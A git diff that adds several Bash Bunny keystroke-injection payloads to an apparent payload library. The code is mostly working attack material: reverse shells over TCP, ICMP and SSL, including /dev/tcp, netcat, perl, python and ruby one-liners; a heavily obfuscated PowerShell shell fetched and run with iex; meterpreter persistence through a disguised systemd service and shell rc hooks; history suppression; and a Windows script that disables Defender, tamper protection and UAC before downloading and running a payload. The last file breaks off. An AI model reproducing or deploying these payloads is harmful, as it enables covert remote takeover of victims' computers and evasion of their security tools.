payloads/library/remote_access/LinuxPreter/README.md Normal file
View File

@@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

12
payloads/library/remote_access/LinuxPreter/payload.sh Normal file
View File

@@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/remote_access/LinuxPreter/payload.txt Normal file
View File

@@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

74
payloads/library/remote_access/PingZhellBunny/Bunny.pl Normal file
View File

@@ -0,0 +1,74 @@
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0i41E for PingZhellBunny
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Loading PingZhellBunny...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
Proto => "ICMP",
Type => SOCK_RAW,
Blocking => 1) or die "$!";
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
#Unnecessary print output - just for fun
sleep(2);
print ". .\n";
sleep(1);
print ". . .";
sleep(1);
print ". . . .";
sleep(2);
print "PingZhellBunny client ready!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
my $ip = NetPacket::IP->decode($buffer);
my $icmp = NetPacket::ICMP->decode($ip->{data});
if ($icmp->{type} == ICMP_ECHO) {
# get identifier and sequencenumber
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
# write data to stdout and read from stdin
print $data;
$input = <STDIN>;
# compile and send response
$icmp->{type} = ICMP_ECHOREPLY;
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
my $raw = $icmp->encode();
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
$sock->send($raw, 0, $addr) or die "$!\n";
}
}
}

10
payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 Normal file
View File

@@ -0,0 +1,10 @@
$Delay=5;
$BufferSize=128;
$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}

41
payloads/library/remote_access/PingZhellBunny/README.md Normal file
View File

@@ -0,0 +1,41 @@
**Title: PingZhellBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
**What is PingZhellBunny?**
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.*
#
There you go, a reverse shell without the usage of ports.
**Instruction:**
Upload Bunny.pl onto your attacking machine.
Install dependencies, if needed:
- IO::Socket
- NetPacket::IP
- NetPacket::ICMP
Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl Bunny.pl`
<p>!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!<br>
<p>Plug in your BashBunny.<br>
Achieve reverse shell.<br>
run away <3</p>
Credit for code and ideas:
- bdamele
- Nikhil Mittal
- krabelize

44
payloads/library/remote_access/PingZhellBunny/payload.txt Normal file
View File

@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: PingZhellBunny
# Description: Getting remote access via ICMP
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP
Q STRING "\$IP = '0.0.0.0';"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
Q DELAY 400
Q ENTER
LED FINISH

15
payloads/library/remote_access/ReverseBunny/README.md Normal file
View File

@@ -0,0 +1,15 @@
**Title: ReverseBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
A pressed CAPSLOCK key as also an indicator light on the bunny will indicate the payloads successfull execution

BIN
payloads/library/remote_access/ReverseBunny/RevBunny.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 10 KiB

25
payloads/library/remote_access/ReverseBunny/RevBunny.ps1 Normal file
View File

@@ -0,0 +1,25 @@
.("{1}{0}" -f't','SE') ("mAI"+"h") ([tYpE]("{1}{0}"-F'Y','ArrA')) ; &("{0}{3}{1}{2}"-f 'se','r','IABLe','t-vA') eU92 ([TYPE]("{0}{1}" -F'sT','RiNG') );.("{0}{1}"-f 'S','et') (("{1}{0}" -f 'W','f83')+'R'+'0') ( [cHaR[ ]]" ))63]rahc[]GNirTs[,'Pou'(ECalPEr.)'\',)88]rahc[+27]rahc[+97]rahc[((ECalPEr.)93]rahc[]GNirTs[,'4EC'(ECalPEr.)'|',)711]rahc[+86]rahc[+76]rahc[((ECalPEr.)43]rahc[]GNirTs[,)28]rahc[+001]rahc[+911]rahc[((ECalPEr.)'
TIXE;)(ESolC.cPou;'+'})(hSUlF.sPou;)hTGnEL.yPou,0,yPou(etIrW.sPou;)xPou(sETyBtEG.)IICSA::]gnidocne.txet[(='+'yPou;Rdw >Rdw+)'+'noitacoL-te'+'G(+Rdw SP@yn'+'nuBRdw+zPou=xPou;)GNirTS-'+'tUouDC1&>2 dPou Xei(=zPou;)iPo'+'u,0,bPou(gnIRtSteG.)gnidocnEIICSA.tXeT.MeTsYs EmaNepYT'+'- TCejBO-wEN(=dPou;{)0 en-)'+')hTgNeL.bP'+'ou,0,bPou(daER.sPou=iPou((eLIhw;}0{%uDC53556..0=bPou]][etyb[;)htgneL'+'.trA'+'ynnuBveRPou,0,trAynnuBveRPou(etirw.sPou;)(mAerTSteG.cPou=sPou;)PPou,IPou(tnE'+'IlCPCT.stEKcOS.tEN.mEtsYS tCEjBo-wEn=c'+'Pou
)4EC}KCOLSPAC{4EC(syeKdneS.hswPo'+'u
;)ynnubPou(setyBteG.IICSA::]gnidocnE'+'.txeT[ = trAynnuBveRPou
llehS.tpircSW tcejbOmoC- tcejbO-we'+'N = hswPou
;@Rdw
...eunitnoc ot ]ret'+'nE[ sserP
/___uDC 31rohpi0 yB '+'
uDC /__ '+' '+'
uDC ,__XHOuDC_u'+'DC uDC_'+'uDC_uDC uDC_uDC_,__XHO /____XHO___XHO/___uDC uDC_uDC___'+'XHO /_XHO uDC___XHO_'+'XHO uDC_XHO
uDC uDC_uDC uDC uDC uDC uDC uD'+'C uDC uDC uDC_uDC'+' uDC /_uDC uDC'+'__ uDC __XHO uDC uDC__ uDC V XHO/__ uDC XHOuDC uDC
uDC u'+'DC uDC uDCXHO _4EC uDCXHO _4E'+'C uDC uDC uDC '+'uDC ___ uDC _ /uDC_'+'_ /__4EC uDC _ / / XHO XHO _ // uDC
_ _ __ _ __ _ _ _/ /_uDC '+'uDC___ ___ __ _ _____ '+'_____/ /_uDC uDC
XHO ___ uDC '+' '+' XHO'+' _'+'__ uDC'+'
______'+' '+' ______
)Rdw(_)Rdw(
)=4EC.4EC=(
)/___XHO(
Rdw@=ynnub'+'Pou'((xEI " ) ; ( .("{1}{2}{0}" -f '-ITEM','G','Et') ('VAR'+'IABLe:'+'M'+'aiH')).vaLue::("{1}{0}"-f'se','reVer').Invoke(( &('Gi') (("{3}{2}{1}{0}" -f ':f','ABLE','RI','VA')+'83w'+'R0'))."v`AlUe" ) ; (.("{0}{2}{1}"-f 'vA','E','RIaBl') eu92 -VaL)::("{0}{1}" -f'Joi','N').Invoke('' ,( &('Gi') (("{2}{1}{0}" -f':f','E','VARIABL')+'83w'+'R0'))."Val`Ue") |&("{1}{0}" -f 'EX','I')

44
payloads/library/remote_access/ReverseBunny/payload.txt Normal file
View File

@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & Port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")"
Q DELAY 400
Q ENTER
LED FINISH

1
payloads/library/remote_access/ReverseBunnySSL/RBSSL.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

30
payloads/library/remote_access/ReverseBunnySSL/README.md Normal file
View File

@@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!Insert the IP of your attacking machine & PORT into the payload.txt!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

BIN
payloads/library/remote_access/ReverseBunnySSL/Startscreen.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 32 KiB

44
payloads/library/remote_access/ReverseBunnySSL/payload.txt Normal file
View File

@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0i41E
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH

85
payloads/library/remote_access/Windows-Payload-Injector/payload.txt Normal file
View File

@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Microsoft Windows Payload Injector
#
# Description:
# 1) Disables Tamper Protection in Windows Defender.
# 2) Disables UAC / Turns UAC off
# 3) Creates Payload Directory in C:/ Drive
# 4) Disables Real-Time Protection in Windows Defender.
# 5) Adds the Payload Directory as an exclusion in Windows Defender
# 6) Downloads Payload from Specified URI (Enter in Variable Below)
# 7) Runs Payload on System
#
# Author: KryptoKola
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows 10 & 11
LED SETUP
ATTACKMODE HID
#Variables
readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
#Disables Tamper Protection in Windows 10 & 11
LED STAGE1
Q GUI s
Q STRING "Virus & threat protection"
Q ENTER
Q DELAY 10000
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 1000
Q TAB
Q TAB
Q TAB
Q TAB
Q SPACE
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q ALT F4
Q FN ALT F4
#Starts Powershell in Admin mode
LED STAGE2
Q GUI r
Q DELAY 250
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 3000
Q ALT y
Q DELAY 5000
#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
LED STAGE3
Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
Q ENTER
Q DELAY 1500
Q ALT y
Q DELAY 250
#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
LED STAGE4
Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
Q ENTER
Q DELAY 2000
#Launches the Payload on the machine
LED STAGE5
Q STRING ./payload.exe
Q ENTER
Q DELAY 250
#Clears the shell and exits out.
LED CLEANUP
Q STRING clear
Q ENTER
Q DELAY 250
Q STRING exit
Q ENTER
LED FINISH

32
payloads/library/remote_access/linux_random-reverse-shell/README.md Normal file
View File

@@ -0,0 +1,32 @@
# Random Reverse Shell
- Title: Random Reverse Shell
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Remote Access
## Description
1) Checks the availability of binaries on the system.
2) Builds a list of possible payloads.
3) Performs one at random.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
```
## Usage
```
hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
```

85
payloads/library/remote_access/linux_random-reverse-shell/payload.txt Normal file
View File

@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 5000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ./random_reverse-shell.sh"
Q ENTER
Q DELAY 1500
Q STRING " \$BASH ./random_reverse-shell.sh ${REMOTE_HOST} ${REMOTE_PORT}"
Q ENTER
Q DELAY 3000
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1000
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

126
payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh Normal file
View File

@@ -0,0 +1,126 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# USAGE
# ==========
# hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
# victim@victim-computer:~$ $BASH ./random_reverse-shell.sh <REMOTE_HOST> <REMOTE_PORT>
#
set -eo pipefail
readonly REMOTE_HOST="${1}"
readonly REMOTE_PORT="${2}"
readonly RANDOM_FILENAME="${RANDOM}"
readonly BINARIES_LIST=(
"/bin/bash"
"/bin/mkfifo"
"/bin/cat"
"/bin/nc"
"/bin/perl"
"/bin/php"
"/bin/python"
"/bin/ruby"
"/bin/sh"
"/bin/mknod"
"/bin/telnet"
)
readonly BASH_PAYLOAD=$(cat <<EOF
/bin/bash -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
#
# [CTRL + c]
#
readonly NC_PAYLOAD=$(cat <<EOF
/bin/mkfifo /tmp/${RANDOM_FILENAME} && /bin/cat /tmp/${RANDOM_FILENAME} | ${BASH} -i 2>&1 | /bin/nc ${REMOTE_HOST} ${REMOTE_PORT} > /tmp/${RANDOM_FILENAME}
EOF
)
#
# Tested on Perl v5.30.0
# [CTRL + c]
#
readonly PERL_PAYLOAD=$(cat <<EOF
/bin/perl -X -MIO -e '\$socket = new IO::Socket::INET(PeerAddr, "${REMOTE_HOST}:${REMOTE_PORT}"); STDIN->fdopen(\$socket, "r"); ($~)->fdopen(\$socket, "w"); system(\$_) while<>'
EOF
)
#
# Tested on PHP v7.4.3
#
readonly PHP_PAYLOAD=$(cat <<EOF
/bin/php -r '\$fsockopen = fsockopen("${REMOTE_HOST}", ${REMOTE_PORT}); exec("${BASH} -i <&3 >&3 2>&3");'
EOF
)
#
# Tested on Python v2.7.18
#
readonly PYTHON_PAYLOAD=$(cat <<EOF
/bin/python -c 'import socket, os, subprocess; tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM); tcp_socket.connect(("${REMOTE_HOST}", ${REMOTE_PORT})); os.dup2(tcp_socket.fileno(), 0); os.dup2(tcp_socket.fileno(), 1); os.dup2(tcp_socket.fileno(), 2); subprocess.call(["${BASH}", "-i"])'
EOF
)
#
# Tested on Ruby v2.7.0p0
#
readonly RUBY_PAYLOAD=$(cat <<EOF
/bin/ruby -rsocket -e 'tcp_socket = TCPSocket.new("${REMOTE_HOST}", ${REMOTE_PORT}); while (command = tcp_socket.gets); command = (command.chomp).downcase; (command == "exit") ? break : tcp_socket.puts(\`#{command}\`) rescue nil; end; tcp_socket.close'
EOF
)
readonly SH_PAYLOAD=$(cat <<EOF
/bin/sh -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
readonly TELNET_PAYLOAD=$(cat <<EOF
/bin/mknod /tmp/${RANDOM_FILENAME} p && /bin/telnet ${REMOTE_HOST} ${REMOTE_PORT} 0</tmp/${RANDOM_FILENAME} | ${BASH} 1>/tmp/${RANDOM_FILENAME}
EOF
)
set -u
available_binaries=()
for binary in "${BINARIES_LIST[@]}"; do
if command -v "${binary}" > /dev/null 2>&1; then
available_binaries+=("${binary}")
fi
done
available_payloads=()
[[ "${available_binaries[*]}" =~ "/bin/bash" ]] && available_payloads+=("${BASH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mkfifo" && "${available_binaries[*]}" =~ "/bin/cat" && "${available_binaries[*]}" =~ "/bin/nc" ]] && available_payloads+=("${NC_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/perl" ]] && available_payloads+=("${PERL_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/php" ]] && available_payloads+=("${PHP_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/python" ]] && available_payloads+=("${PYTHON_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/ruby" ]] && available_payloads+=("${RUBY_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/sh" ]] && available_payloads+=("${SH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mknod" && "${available_binaries[*]}" =~ "/bin/telnet" ]] && available_payloads+=("${TELNET_PAYLOAD}") || echo ""
random_payload=${available_payloads[$RANDOM % "${#available_payloads[@]}"]}
$BASH -c "${random_payload}" &

36
payloads/library/remote_access/persistentReverseBunny/README.md Normal file
View File

@@ -0,0 +1,36 @@
## About:
* Title: persistentReverseBunny
* Description: persistentReverseBunny provides you persistent reverse shell remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, STORAGE
## persistentReverseBunny: provides you persistent encoded reverse shell remotely/locally within 15 secs.
### Workflow:
Keeping tracks clear by disabling and deleting history. Creating hidden directory to store payload. Creating payload mechanism and compiling it for obfuscation, which checks whether internet is connected to the target system, if yes then it creates reverse shell to attackers machine. Creating non-root systemd service to keep payload running in background. Enabling service. Autostarting service on trigger of terminal emulator or shell.
### Algorithm:
1. Stop storing history, this helps to keep tracks clear from begining.
2. Creating reverse shell.
3. Creating non-root systemd service.
4. Enabling service.
5. Starting service on trigger of firing terminal emulator/shell.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| ----------------------- | ----------------------------- |
| payload.txt | /payloads/switch1/ |
| persistentReverseBunny/ | /payloads/libray/ |
### Note:
* Change ip address(0.0.0.0) and port number(4444) to your server's ip address and port number in `reversePersistentBunny/payload.sh` on line `6`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

51
payloads/library/remote_access/persistentReverseBunny/payload.txt Normal file
View File

@@ -0,0 +1,51 @@
# Description: persistentReverseBunny provides you persistent and ofuscated reverse shell remotely/locally within 15 secs.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
